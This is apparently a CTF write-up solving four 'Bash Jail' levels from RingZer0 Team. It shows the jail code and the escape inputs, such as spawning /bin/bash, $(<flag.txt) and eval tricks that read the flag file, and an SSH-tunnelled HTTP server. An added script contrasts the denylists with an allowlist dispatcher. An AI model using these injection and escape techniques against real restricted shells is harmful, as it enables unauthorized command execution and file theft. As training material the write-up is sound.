Using CTFs to learn and keep sharp

Bash Jails — Level 1

ssh level1@ringzer0team.com -p 1016
Password level1

BASH Jail Level 1:
Current user is uid=1000(level1) gid=1000(level1) groups=1000(level1)
Flag is located at /home/level1/flag.txt
Challenge bash code:
-----------------------------
while :
do
    echo "Your input:"
    read input
    output=`$input`
done
-----------------------------
Your input:

-----------------------------
Your input:
/bin/bash
level1@lxc17-bash-jail:~$ ls 1>&2
flag.txt  prompt.sh
level1@lxc17-bash-jail:~$ cat flag.txt 1>&2
FLAG-XXXXXXXXXXXXXXXXXXXXXXXXXX
level1@lxc17-bash-jail:~$

Bash Jails — Level 2

ssh level2@ringzer0team.com -p 1016
Password FLAG-XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Current user is uid=1001(level2) gid=1001(level2) groups=1001(level2)
Flag is located at /home/level2/flag.txt
Challenge bash code:
-----------------------------
function check_space {
    if [[ $1 == *[bdks';''&'' ']* ]]
    then
        return 0
    fi
    return 1
}

while :
do
    echo "Your input:"
    read input
    if check_space "$input"
    then
        echo -e '\033[0;31mRestricted characters has been used\033[0m'
    else
        output="echo Your command is: $input"
        eval $output
    fi
done
-----------------------------

$(<flag.txt)

Your input:
"$(<flag.txt)"
Your command is: FLAG-XXXXXXXXXXXXXXXXXXXXXXXX
Your input:

Bash Jails — Level 3

RingZer0 Team Online CTF

BASH Jail Level 3:
Current user is uid=1002(level3) gid=1002(level3) groups=1002(level3)
Flag is located at /home/level3/flag.txt
Challenge bash code:
-----------------------------
WARNING: this prompt is launched using ./prompt.sh 2>/dev/null

# CHALLENGE
function check_space {
    if [[ $1 == *[bdksc]* ]]
    then
        return 0
    fi
    return 1
}

while :
do
    echo "Your input:"
    read input
    if check_space "$input"
    then
        echo -e '\033[0;31mRestricted characters has been used\033[0m'
    else
        output=`$input` &>/dev/null
        echo "Command executed"
    fi
done
-----------------------------

output=`$input` &>/dev/null

Your input:
Command executed
Your input:
eval $(<flag.txt) 2>&0
./real.sh: line 39: FLAG-xxxxxxxxxxxxxxxxxxxxxxxxxxx: command not found
Command executed

Bash Jails — Level 4

RingZer0 Team Online CTF

BASH Jail Level 4:
Current user is uid=1003(level4) gid=1003(level4) groups=1003(level4)
Flag is located at /home/level4/flag.txt
Challenge bash code:
-----------------------------
WARNING: this prompt is launched using ./prompt.sh 2>/dev/null

# CHALLENGE
function check_space {
    if [[ $1 == *[bdksc'/''<''>''&''$']* ]]
    then
        return 0
    fi
    return 1
}

while :
do
    echo "Your input:"
    read input
    if check_space "$input"
    then
        echo -e '\033[0;31mRestricted characters has been used\033[0m'
    else
        output=`$input < /dev/null` &>/dev/null
        echo "Command executed"
    fi
done
-----------------------------

$ ssh -L 11111:localhost:11111 level4@ringzer0team.com -p 1016
python -m SimpleHTTPServer 11111
Python
>>> import urllib2
>>> urllib2.urlopen("http://127.0.0.1:11111/flag.txt").read()
'FLAG-xxxxxxxxxxxxxxxxxxxxxx\n'
>>>
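
Why all four jails fall to the inputs shown above, as an added example that is not part of the original write-up or the challenge's own code: the character sets from Levels 2 to 4 are re-expressed as case patterns and compared with an allowlist dispatcher that never evaluates its input. The function names and the whoami/help menu are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example: the jails' character denylists beside an allowlist dispatcher.
# Nothing passed in is executed; each input line is only classified.

# denylist_blocks LEVEL INPUT -> 0 if that level's check_space would reject INPUT.
# Character sets copied from the challenge code above (Level 1 has no filter).
denylist_blocks() {
    case "$1" in
        2) case "$2" in *[bdks';& ']*) return 0 ;; esac ;;
        3) case "$2" in *[bdksc]*) return 0 ;; esac ;;
        4) case "$2" in *[bdksc'/<>&$']*) return 0 ;; esac ;;
    esac
    return 1
}

# allowlist_accepts INPUT -> 0 only for an exact name from a fixed menu
# (hypothetical menu). The input is compared as data and never reaches
# eval, backticks or command substitution.
allowlist_accepts() {
    case "$1" in
        whoami|help) return 0 ;;
        *) return 1 ;;
    esac
}

# verdict LEVEL INPUT -> "denylist=<passed|blocked> allowlist=<accepted|rejected>"
verdict() {
    local d=passed a=rejected
    denylist_blocks "$1" "$2" && d=blocked
    allowlist_accepts "$2" && a=accepted
    printf 'denylist=%s allowlist=%s\n' "$d" "$a"
}

# Lines shown in each level's section, checked against that level's filter,
# followed by two constructed inputs for contrast.
print_report() {
    verdict 1 '/bin/bash'
    verdict 2 '$(<flag.txt)'
    verdict 3 'eval $(<flag.txt) 2>&0'
    verdict 4 'python -m SimpleHTTPServer 11111'
    verdict 2 'cat flag.txt'   # constructed: the obvious attempt, which the filter does stop
    verdict 2 'whoami'         # constructed: an entry from the fixed menu
}
print_report
```

Every line from the write-up passes its level's denylist because none of them needs a listed character, while the allowlist rejects them all since it matches whole commands rather than hunting for bad characters.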

Greg

Security addict, 17+ years in industry making systems more secure and finding those that aren’t